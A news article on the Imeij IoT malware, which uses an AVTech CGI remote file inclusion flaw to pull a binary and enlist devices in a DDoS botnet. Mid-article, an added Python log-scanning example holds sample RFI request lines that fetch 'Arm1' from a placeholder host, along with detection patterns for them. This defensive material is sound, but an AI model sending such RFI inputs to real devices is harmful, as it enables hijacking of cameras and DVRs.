A new malware strain named Imeij has been detected in the wild targeting equipment made by Taiwanese manufacturer AVTech. According to Trend Micro researchers, the malware exploits a security flaw that AVTech engineers failed to patch after it was disclosed in October 2016.
The news of a new IoT malware rearing its ugly head isn't such a big surprise anymore. Over the past year, IoT malware has helped crooks build massive botnets, which they often used to launch DDoS attacks of epic proportions.
While for many years the GafGyt malware strain dominated the IoT malware landscape, in 2016, new threats rose to power, such as Mirai, LuaBot, Rex, PNScan, LizardStresser, Hajime, and others.
Compared to 2016, 2017 has been a little tamer so far, with fewer new IoT threats and most malware authors investing in improving their existing threats instead.
The first major IoT malware discovered this year is ELF_IMEIJ.A, aka Imeij, spotted by Trend Micro researchers and made public last week.
According to researchers, this malware isn't as sophisticated as its counterparts, as it only includes an exploit for a single vulnerability.
That particular vulnerability was publicly disclosed in October 2016 by security researchers from Search-Lab, who after months of trying and failing to get in contact with Taiwanese vendor AVTech, decided to go public with 14 security flaws they found in the firmware of AVTech devices.
Five months later, one of the 14 flaws was integrated in the Imeij malware, which uses it to take over AVTech equipment and add the hijacked devices to its DDoS botnet.
That particular vulnerability is a remote file inclusion (RFI) that can be triggered by accessing a CGI script belonging to the AVTech Cloud service, included in the firmware of various devices, such as DVRs, IP cameras, and other CCTV equipment.
The RFI exploit forces the device to download the Imeij malware binary from three IPs registered to a South Korean ISP. Over 130,000 AVTech devices are currently exposed online.
The malware, which only targets Linux-based ARM devices, works by gathering info on the infected device, sending it to a remote server, and launching DDoS attacks on demand. A final feature allows the botnet operator to clean the device and remove the malware, if he chooses to.
In recent months, after the Mirai author released his malware's source code online, most of the IoT malware landscape has been flooded with Mirai variants.
There is no connection between Mirai and the new Imeij malware, according to Trend Micro researchers. Mirai targets multiple IoT platforms running BusyBox and is self-spreading via a built-in brute-forcing function.
Imeij is spread by its author, who scans for AVTech devices and uses a flaw in the device's built-in web server CGI module. Mirai also targets more brands than just AVTech and operates over ports 5555, 7547, and 48101, whereas Imeij only uses port 39999.
Bleeping Computer spoke with malware expert Dr. Vesselin Bontchev, who says that despite the familiar-sounding name, Imeij has nothing in common with Hajime, a malware family spotted for the first time in mid-October last year.
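As an added example (not part of the original article or of Trend Micro's analysis), the following Python checks defender-side logs for the two indicators the article gives: a CGI request whose parameter carries a remote URL (the RFI pattern used to pull the binary) and outbound connections to port 39999. The CGI script path, IP addresses and log lines below are constructed placeholders; the article does not name the actual AVTech endpoint, and the real path should be substituted from vendor or Trend Micro advisories.

```python
import re
from urllib.parse import unquote

# Constructed sample data (not real Imeij traffic): web-server access log lines as a
# device's CGI module might write them, plus firewall connection records.
ACCESS_LOG = [
    '203.0.113.7 - - [12/Mar/2017:10:01:02 +0000] "GET /cgi-bin/PLACEHOLDER_cloud.cgi?file=http://198.51.100.9/Arm1 HTTP/1.1" 200 512',
    '203.0.113.8 - - [12/Mar/2017:10:01:05 +0000] "GET /cgi-bin/PLACEHOLDER_cloud.cgi?page=status HTTP/1.1" 200 1024',
    '203.0.113.9 - - [12/Mar/2017:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048',
    # Same RFI attempt with the URL percent-encoded, which a naive substring match would miss.
    '203.0.113.7 - - [12/Mar/2017:10:03:11 +0000] "GET /cgi-bin/PLACEHOLDER_cloud.cgi?file=http%3A%2F%2F198.51.100.9%2FArm1 HTTP/1.1" 200 512',
]
CONN_LOG = [
    "2017-03-12T10:01:10Z src=192.0.2.10 dst=198.51.100.9 dport=39999 proto=tcp",
    "2017-03-12T10:01:12Z src=192.0.2.10 dst=198.51.100.20 dport=443 proto=tcp",
]

# Port the article associates with Imeij's command-and-control traffic.
IMEIJ_C2_PORT = 39999

# Common-log-format request line: client address, then the quoted "METHOD path HTTP/x".
REQ_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
# RFI indicator: a CGI script invoked with a query parameter whose value is a remote URL.
CGI_RFI_RE = re.compile(r'/cgi-bin/[^?]+\?.*?=(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(lines):
    """Return one record per access-log line that looks like an RFI attempt against a CGI script."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue
        path = unquote(m.group("path"))  # decode %3A%2F%2F so encoded URLs are caught too
        if CGI_RFI_RE.search(path):
            hits.append({"src": m.group("src"), "path": path})
    return hits


def find_c2_connections(lines, port=IMEIJ_C2_PORT):
    """Return parsed connection records whose destination port matches the C2 port."""
    hits = []
    for line in lines:
        fields = dict(kv.split("=", 1) for kv in line.split()[1:])
        if fields.get("dport") == str(port):
            hits.append(fields)
    return hits


if __name__ == "__main__":
    for h in find_rfi_attempts(ACCESS_LOG):
        print("RFI attempt from", h["src"], "->", h["path"])
    for c in find_c2_connections(CONN_LOG):
        print("possible C2 traffic:", c["src"], "->", c["dst"], "port", c["dport"])
```

A hit on the RFI pattern alone is a strong signal on a device that should never fetch remote files through its CGI interface; the port check is weaker on its own and is best correlated with the RFI hit from the same device.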
"Hajime is a worm. It self-replicates from one infected host to another," Dr. Bontchev said. "This thing [Imeij] uses a command-and-control server which sends the bot to the host it is trying to infect, taking the bot from a repository."
"Hajime uses the name '.i' for its ARM executable," he added. "This thing uses 'Arm1'. [...] If I have to guess, I'd say that it belongs to a different family."
Recently, Dr. Bontchev has been keeping an eye on Hajime versions, which are now very different from the versions first released in October last year. According to Cybereason researchers, recent Hajime versions are modifying local firewall rules to keep other IoT malware out and prolong its stay on the infected device.